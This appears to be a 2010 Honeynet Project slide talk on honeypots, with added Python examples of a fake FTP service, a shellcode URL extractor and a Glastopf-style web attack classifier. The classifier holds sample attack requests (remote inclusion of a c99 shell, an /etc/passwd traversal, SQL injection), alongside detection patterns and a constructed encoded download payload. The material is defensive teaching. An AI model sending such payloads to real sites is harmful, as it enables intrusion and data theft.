
USE

Honeypots
TO KNOW YOUR ENEMIES

Adel Karimi
The Honeynet Project

Nov 14, 2010

Speaker
Adel Karimi
Member of The Honeynet Project (Iranian Chapter Lead)
Editor-in-chief of Snoop Security Ezine
M.S. Student @ Tehran Polytechnic

Agenda
About The Honeynet Project
Introduction to Honeypots
High-Interaction Honeypots
Low-Interaction Honeypots
Client Honeypots

The Honeynet Project


Founded in 1999, The Honeynet Project is an international, non-profit research organization dedicated to improving the security of the Internet at no cost to the public. We accomplish this goal in the following three ways:
Awareness - We raise awareness of the threats and vulnerabilities that exist in the Internet today
Information - For those who are already aware and concerned, we provide details to better secure and defend your resources
Tools

~ 40 International Chapters

Iranian Honeynet Chapter

Honeynet Project Challenges


Learn about threats, analyze attacks, and share findings. //honeynet.org/challenges

Past Challenges:
Challenge 6 - Analyzing Malicious Portable Destructive Files
Challenge 5 - Log Mysteries
Challenge 4 - VoIP
Challenge 3 - Banking Troubles
Challenge 2 - Browsers Under Attack
Challenge 1 - Pcap Attack Trace

Honeypots
Definition: A honeypot is a security resource whose value lies in being probed, attacked, or compromised.
- Lance Spitzner

A honeypot has no production value, so anything going to or from it is likely a probe, attack or compromise.

Honeypots
Uses of honeypots
Slowing down and following incoming attackers
Catching and analyzing 0-days, malware, botnets, and so on
Improving intrusion detection systems:
SurfIDS
Nebula (an intrusion signature generator)

To learn the tools, tactics and motives involved in computer and network attacks.

SurfIDS

Features: Distributed sensors, Central honeypot deployment, Central logging.

Honeypots
Honeypot vs. IDS
Honeynet: a network of [High-Interaction] honeypots
Main requirements:
Data Control
Data Capture
Data Analysis
Data Collection

Types of Honeypots
Production vs. Research honeypots:
Production honeypots protect an organization, while research honeypots are used to learn.

Different Types:
High-Interaction
Real environment

Low-Interaction
Simulated resource(s)

Physical vs. Virtual !?

High-Interaction Honeypots
Honeywall: for capturing, controlling and analyzing attacks
It creates an architecture that allows you to deploy both LI and HI honeypots, but is designed primarily for HI.
Layer 2 bridging device (based on CentOS 5)
Tools:
IPtables
Snort_inline
Snort
Hflow
P0f
Argus
Sebek
Walleye

Walleye web interface

Honeywall

High-Interaction Honeypots
SEBEK
For data capture: a hidden kernel module that captures all of the attacker's activity on the honeypot

High-Interaction Honeypots
Qebek (QEMU Sebek)
A QEMU-based HI honeypot monitoring tool which aims at improving the invisibility of monitoring the attackers' activities in HI honeypots. Two techniques: virtual machine introspection (VMI) and system view reconstruction (SVR).
VMI enables the IDS or other security system to monitor system events from outside the virtual machine, while SVR allows the monitoring system to reconstruct meaningful high-level OS information from the raw hardware-level information generated by VMI.
Read the recently published KYT paper, Qebek - Conceal the Monitoring
- The paper is available from http://honeynet.org/papers/KYT_qebek

Low-Interaction Honeypots
Honeyd
Written by Niels Provos in 2002. Available at www.honeyd.org
Features:
Simulates thousands of virtual hosts at the same time
Configuration of arbitrary services via a simple configuration file
Simulates operating systems at the TCP/IP stack level
Tarpit
Dynamic templates
Subsystem virtualization: run real UNIX applications under virtual Honeyd IP addresses
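The "arbitrary services via a simple configuration" idea, as an added example that is not Honeyd's own code (Honeyd is written in C and driven by its own configuration file). Each emulated port is a banner plus a table of canned replies, and every line the client sends is logged, because nothing legitimate should ever talk to a honeypot. The service banners, log format and listening ports below are assumptions made for this sketch.

```python
"""Low-interaction service emulation in the spirit of Honeyd (added example)."""
import datetime
import socketserver

# Emulated services, keyed by the port they pretend to be.  Replies are
# chosen by the first word of each client line; unknown input gets "default".
# All banners and reply strings are assumed for this example.
SERVICES = {
    21: {
        "name": "ftp",
        "banner": b"220 ProFTPD 1.3.3 Server ready.\r\n",
        "replies": {
            b"USER": b"331 Password required.\r\n",
            b"PASS": b"530 Login incorrect.\r\n",
            b"QUIT": b"221 Goodbye.\r\n",
        },
        "default": b"500 Unknown command.\r\n",
    },
    23: {
        "name": "telnet",
        "banner": b"login: ",
        "replies": {},
        "default": b"Login incorrect\r\nlogin: ",
    },
}

LOG = []  # in-memory event log; a real sensor ships this to central logging


def log_event(port, peer, data):
    """Record one client line; returns the entry so callers can inspect it."""
    entry = {
        "ts": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "service": SERVICES[port]["name"],
        "port": port,
        "peer": peer,
        # latin-1 never fails, so hostile bytes cannot crash the logger
        "data": data.decode("latin-1"),
    }
    LOG.append(entry)
    return entry


def respond(port, line):
    """Canned reply for one client line on an emulated port."""
    svc = SERVICES[port]
    verb = line.strip().split(b" ", 1)[0].upper()
    return svc["replies"].get(verb, svc["default"])


def session(port, peer, lines):
    """Drive one emulated session; yields the bytes to send to the client.

    Protocol-independent core: the socket handler below just feeds it lines.
    The session ends on QUIT or when the client stops sending.
    """
    yield SERVICES[port]["banner"]
    for line in lines:
        log_event(port, peer, line)
        yield respond(port, line)
        if line.strip().upper().startswith(b"QUIT"):
            break


class HoneyHandler(socketserver.StreamRequestHandler):
    """One TCP connection; 'emulated' is set on the server by make_server()."""

    def handle(self):
        client_lines = iter(self.rfile.readline, b"")
        for chunk in session(self.server.emulated, self.client_address[0], client_lines):
            self.wfile.write(chunk)
            self.wfile.flush()


def make_server(emulated_port, bind=("127.0.0.1", 0)):
    """Listen on 'bind' (port 0 = any free port) while pretending to be 'emulated_port'.

    Binding a high port avoids running as root; in a real deployment the
    firewall redirects the low port here.
    """
    srv = socketserver.ThreadingTCPServer(bind, HoneyHandler)
    srv.emulated = emulated_port
    return srv


if __name__ == "__main__":
    srv = make_server(21, ("0.0.0.0", 2121))
    print("fake ftp on 2121; every line received is logged")
    try:
        srv.serve_forever()
    finally:
        srv.server_close()
```

Run it, connect with `nc 127.0.0.1 2121`, and every line typed ends up in `LOG`; with Honeyd the same table would be the `add <template> tcp port 21 "script"` lines of its config file, and Honeyd would additionally fake the OS fingerprint at the TCP/IP level, which this sketch does not.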

Low-Interaction Honeypots
Nepenthes
Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities.
(Excerpt from Nepenthes website)

Nepenthes is outdated
Do not use Nepenthes, use Dionaea instead. Read why: http://carnivore.it/2009/10/27/introducting_dionaea

PHARM - is a client/server tool to manage, report and analyze all your distributed nepenthes instances from one interface.

Low-Interaction Honeypots
Mwcollect
mwcollectd is a versatile malware collection daemon, uniting the best features of nepenthes and honeytrap.

Low-Interaction Honeypots
Dionaea
Nepenthes' successor. Dionaea's intention is to trap malware exploiting vulnerabilities exposed by services offered to a network.

Features:
Static state machines to emulate vulnerable services
Pattern matching to extract values from shellcode
Downloads a copy of the attacking worm
Stores it on disk, or submits it to a sandbox

Dionaea
Features:
Implements the required parts of the SMB protocol
Uses libemu (beyond pattern matching)
Fewer services, better emulation and better logging.
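What "pattern matching to extract values from shellcode" means, and where it stops, as an added example that is not Nepenthes' or Dionaea's own code. A plain URL is found with a regex; a payload hidden behind a known single-byte XOR decoder is recovered by matching the decoder's opcode sequence and reading the key out of it; an unknown single-byte XOR can still be brute-forced. Anything more elaborate needs real x86 emulation, which is the gap libemu fills. The decoder signature, the sample blobs and the download URL are constructed for this example (the stub is only the xor/inc/loop core, with no get-PC prologue).

```python
"""Extracting download URLs from captured shellcode by pattern matching (added example)."""
import re

URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")

# Signature of a minimal in-place loop decoder (constructed for this example):
#   B1 nn       mov  cl, nn          ; payload length
#   80 33 kk    xor  byte [ebx], kk  ; decode one byte in place
#   43          inc  ebx
#   E2 FA       loop -6              ; back to the xor
# Groups: (length, key).  A real collector carries a table of such signatures.
XOR_STUB_RE = re.compile(rb"\xb1(.)\x80\x33(.)\x43\xe2\xfa", re.DOTALL)


def xor(data, key):
    """Single-byte XOR over a byte string."""
    return bytes(b ^ key for b in data)


def find_urls(blob):
    """All plain-text URLs in a byte string, decoded as latin-1 for logging."""
    return [m.decode("latin-1") for m in URL_RE.findall(blob)]


def extract_urls(blob):
    """Return {'method': ..., 'key': ..., 'urls': [...]} for a captured blob."""
    # 1. Cheapest case: the URL is sitting there unencoded.
    urls = find_urls(blob)
    if urls:
        return {"method": "plain", "key": None, "urls": urls}

    # 2. Known decoder: read key and length out of the stub itself and decode
    #    only the bytes the stub says it would decode.
    m = XOR_STUB_RE.search(blob)
    if m:
        length, key = m.group(1)[0], m.group(2)[0]
        payload = blob[m.end():m.end() + length]
        urls = find_urls(xor(payload, key))
        if urls:
            return {"method": "xor-stub", "key": key, "urls": urls}

    # 3. Unknown decoder: try every single-byte key.  Cheap, but it only ever
    #    beats this one trivial encoding; a multi-byte or alphanumeric encoder
    #    needs emulation (libemu), not more patterns.
    for key in range(1, 256):
        urls = find_urls(xor(blob, key))
        if urls:
            return {"method": "xor-bruteforce", "key": key, "urls": urls}

    return {"method": "none", "key": None, "urls": []}


def build_samples():
    """Constructed shellcode-like blobs for testing; not real exploit code."""
    url = b"http://203.0.113.9/bot.exe"          # documentation address
    plain = b"\x90" * 8 + b"URLMON\x00URLDownloadToFileA\x00" + url + b"\x00"
    key = 0x5A
    stub = (b"\x31\xc9"                          # xor ecx, ecx
            + b"\xb1" + bytes([len(plain)])      # mov cl, len
            + b"\x80\x33" + bytes([key])         # xor byte [ebx], key
            + b"\x43\xe2\xfa")                   # inc ebx; loop
    return {
        "plain": plain,
        "stubbed": stub + xor(plain, key),       # known decoder + encoded payload
        "unknown": b"\xeb\x10" + xor(plain, 0x77),  # encoded, decoder not in our table
        "noise": bytes(range(256)),              # nothing to find
    }


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(name, extract_urls(blob))
```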

Low-Interaction Honeypots
Amun A Python Honeypot
Basically a Nepenthes port to Python

Amun
A sample of collected attack data from Amun:

Amun

DEMO
//Using Metasploit to Launch an Attack against Amun (MS08-067)

Source: http://amunhoney.sourceforge.net

Low-Interaction Honeypots
A new approach..

Glastopf A dynamic, LI web-app honeypot


A minimalistic web server written in Python
Collects information about web application-based attacks like RFI, SQL injection, and LFI
Glastopf scans the incoming request for strings like =http:// or =ftp://
Tries to download and analyze the file, and responds as close as possible to the attacker's expectations
The attacker sends us, for example, a bot, shell or spreader
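The request handling described above, as an added example that is not Glastopf's own code. It looks at each request for a remote-file-inclusion attempt (a parameter whose value is a URL, i.e. the "=http://" / "=ftp://" strings Glastopf scans for), for local file inclusion and for SQL injection, pulls out the URL an RFI attack wants the server to fetch, and picks the kind of response the attacker's tool expects to see. The actual download of the remote file is deliberately left out so the example runs offline; the request lines, the detection patterns and the canned responses are constructed.

```python
"""Glastopf-style classification of incoming web requests (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter values that are themselves URLs: the "=http://" / "=ftp://" case.
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Local file inclusion: traversal, classic targets, NUL-byte truncation.
LFI_RE = re.compile(r"(?:\.\./|/etc/passwd|/proc/self/environ|\x00)", re.IGNORECASE)
# A deliberately small SQL injection pattern set (assumed, not Glastopf's).
SQLI_RE = re.compile(
    r"(?:'\s*(?:or|and)\s|union\s+(?:all\s+)?select|;\s*drop\s|--\s*$|/\*)",
    re.IGNORECASE,
)

# Assumed fake content for the commonest LFI target, so the attacker's tool
# believes the include worked and keeps talking to us.
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/bin/sh\n"


def classify(request_line):
    """Parse 'METHOD target HTTP/x.y' and return (kind, param, value) findings."""
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        return []                      # malformed request line: nothing to classify
    query = urlsplit(parts[1]).query   # parse_qsl percent-decodes each value
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if URL_RE.match(value):
            findings.append(("rfi", name, value))
        elif LFI_RE.search(value):
            findings.append(("lfi", name, value))
        elif SQLI_RE.search(value):
            findings.append(("sqli", name, value))
    return findings


def respond(findings):
    """Choose (status, body, next_action) so the attacker sees what they expect.

    next_action is what a full honeypot would do; fetching the RFI payload is
    the one side effect this offline example does not perform.
    """
    for kind, name, value in findings:
        if kind == "rfi":
            return 200, "", f"fetch {value} for analysis, then serve its expected output"
        if kind == "lfi" and "passwd" in value:
            return 200, FAKE_PASSWD, "log LFI probe, serve fake /etc/passwd"
        if kind == "lfi":
            return 200, "", "log LFI probe"
        if kind == "sqli":
            # Mimic a database error so scanners flag the site as injectable.
            return 500, "You have an error in your SQL syntax", "log SQL injection attempt"
    return 404, "Not Found", "serve a plausible default page"


# Constructed sample request lines (203.0.113.0/24 is a documentation range).
SAMPLE_REQUESTS = [
    "GET /index.php?page=http://203.0.113.7/c99.txt? HTTP/1.1",
    "GET /index.php?file=../../../../etc/passwd HTTP/1.1",
    "GET /login.php?user=admin%27%20OR%20%271%27%3D%271&pw=x HTTP/1.1",
    "GET /about.html HTTP/1.1",
]


def handle(request_line):
    """Classify one request and decide the response; returns a log-ready dict."""
    findings = classify(request_line)
    status, body, action = respond(findings)
    return {"request": request_line, "findings": findings, "status": status, "action": action}


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(handle(line))
```

Checking the decoded parameter value rather than grepping the raw request means `page=http%3A%2F%2F...` is caught as well as the literal `=http://` string; the trailing `?` on the RFI URL is kept because it is part of what the attacker wants fetched.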

Client Honeypots
What is a HoneyClient!?
Drive-by Download Attacks

Source: Canadian Honeynet Project

Source: http://www.honeynet.org/papers/mw

Other Types of Honeypots


WiFi Honeypot
VoIP Honeypot:
VoIP Honey
Artemisa

SSH Honeypot
Kippo
Kojoney

Conclusion
You can use Honeypots to know your enemies..!
Collecting malware
Tracking botnets

Virtual Honeypots: From Botnet Tracking to Intrusion Detection By Niels Provos, Thorsten Holz

Use Honeypots to Know Your Enemies


By Adel Karimi Iranian Honeynet Chapter adel.net at Gmail.com

Thank You..
